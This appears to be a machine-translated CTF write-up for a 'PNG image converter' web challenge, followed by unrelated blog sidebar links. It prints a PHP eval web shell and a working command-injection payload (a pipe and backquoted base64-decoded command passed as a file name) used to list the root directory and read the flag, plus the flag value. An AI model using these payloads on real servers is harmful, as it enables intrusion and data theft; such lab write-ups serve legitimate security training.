当前位置:网站首页>Intelligent security of the fifth space ⼤ real competition problem ----------- PNG diagram ⽚ converter
Intelligent security of the fifth space ⼤ real competition problem ----------- PNG diagram ⽚ converter
2022-07-29 05:52:00 【EdmunDJK】
Fifth, space intelligent security ⼤ The real title of the competition ----------PNG chart ⽚ converter
The problem solving steps :
Don't talk much , See the attachment of the title , Lower him , Use Notepad to open and find the source code of the web page , The same as usual , To examine !
After the code audit, we can see , File pair … / Sign into ⾏ Filtered , So we can't upload directly
stay convert Can be found in file.open Loopholes can benefit ⽤.
First of all, let's understand the meaning of this sentence upload file /png Format , return base64 Encrypted file name
"var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
Let's upload one at will .png file , The content is one sentence , In case of success ?
GIF89a
<?php phpinfo(); @eval($_POST['123']); ?>
Click on upload Show upload success
We can see that the file name has been modified , Next, let's convert the contents of the file , Click on convert
Enter the file name modified above , Click on submit
It is not difficult to find that the contents of our documents have been base64 It's encrypted
Then we can't upload a sentence directly to the Trojan horse , But now that it has read the file , Even though we did base64 encryption , We can also directly put us shell Just put the command in and decrypt it
But the above has been filtered through code audit … / Symbol , So here we use `` The quotes and || Pipe symbol to do what we want , Here we first introduce the functions of backquotes and pipe characters
The quotation marks :
You can also use shell Special characters for .Shell To get the result of the command in backquotes , It actually executes the command specified in the backquote . Execution time , Special characters in commands , Such as $,”,? And so on will have special meanings , And what the backquotes contain can be any legal Shell command
$ ls
note readme.txt Notice Unix.dir
$ TestString="`echo $HOME ` ` ls [nN]*`"
$ echo $TestString
/home/yxz note Notice
Reference link :https://blog.csdn.net/weixin_40240670/article/details/86694724
Pipe, :
The output of one command can be used as the input of another through the pipeline .
“|” Is the pipeline command operator , Abbreviation: pipe symbol . utilize Linux The supplied pipeline symbol “|” Separate the two commands , The output of the command to the left of the pipe will be used as the input to the command on the right of the pipe . Continuous use of pipes means that the output of the first command will be as The input of the second command , The output of the second command is used as the input of the third command , And so on
Use bp Grab the bag , Use the file name just uploaded , Click on sumbit
We can see the transformation diagram below ⽚ My bag , To repeater
So let's start here , The source file uses base64 encryption , Then let's use the back quotation marks inside the back quotation marks shell Command execution , Then use the pipe symbol to decrypt the converted file
Here we use ls / To view the files in its root directory , To carry out an order base64 encryption , Add base64 Decryption instructions , take shell Command output to the uploaded image file .
Report errors , Re examination found that there was one less pipe symbol ...... again send
file=|`echo bHMgLw== | base64 -d`>4755211f043684058811cb50d9ddb4df.png
render There seems to be nothing in it , Enter the page to see
See a string of base64 Encrypted content , Explain ! Use hackbar
Choose base64 decode, Decrypt the above content to see its root directory , There is one flag_9707 file
Now that I know flag Location , Then let's go directly cat Command input , Old method , Yes cat /flag_9707 Conduct base64 encryption , Add base64 Decryption instructions , take shell Command output flag Content to the uploaded image file
file=|`echo Y2F0IC9mbGFnXzk3MDc= | base64 -d`>4755211f043684058811cb50d9ddb4df.png
Click on send No report error , Enter the page to view
Decrypt the following content to get flag
ctfhub{4d99ffb30443051a909a2e0d}
There are many deficiencies in the article , Please spray gently ....
边栏推荐
- SQL修复重复数据
- Elastic box flex
- Idea using JDBC to connect mysql database personal detailed tutorial
- Huawei 2020 school recruitment written test programming questions read this article is enough (Part 1)
- Training log III of "Shandong University mobile Internet development technology teaching website construction" project
- NIFI 改UTC时间为CST时间
- DeFi 2.0的LaaS协议,重振DeFi赛道发展的关键
- Laravel service container (inheritance and events)
- Crypto巨头们ALL IN元宇宙,PlatoFarm或能突围
- The completely decentralized programming mode does not need servers or IP, just like a aimless network extending everywhere
猜你喜欢
随机推荐
Elastic box flex
Flink connector Oracle CDC 实时同步数据到MySQL(Oracle19c)
焕然一新,swagger UI 主题更改
新手入门:手把手从PHP环境到ThinkPHP6框架下载
中海油集团,桌面云&网盘存储系统应用案例
PHP如何生成二维码?
闪贷Dapp的调研及实现
xtrabackup 的使用
华为2020校招笔试编程题 看这篇就够了(上)
C# 连接 SharepointOnline WebService
“山东大学移动互联网开发技术教学网站建设”项目实训日志七
剑指核心-TaoCloud全闪SDS助力构建高性能云服务
Plato Farm有望通过Elephant Swap,进一步向外拓展生态
华为2020校招笔试编程题 看这篇就够了(下)
Seay source code audit system
Training log III of "Shandong University mobile Internet development technology teaching website construction" project
获取水仙花数
Laravel swagger add access password
打印出1-100之间的所有质数
“山东大学移动互联网开发技术教学网站建设”项目实训日志二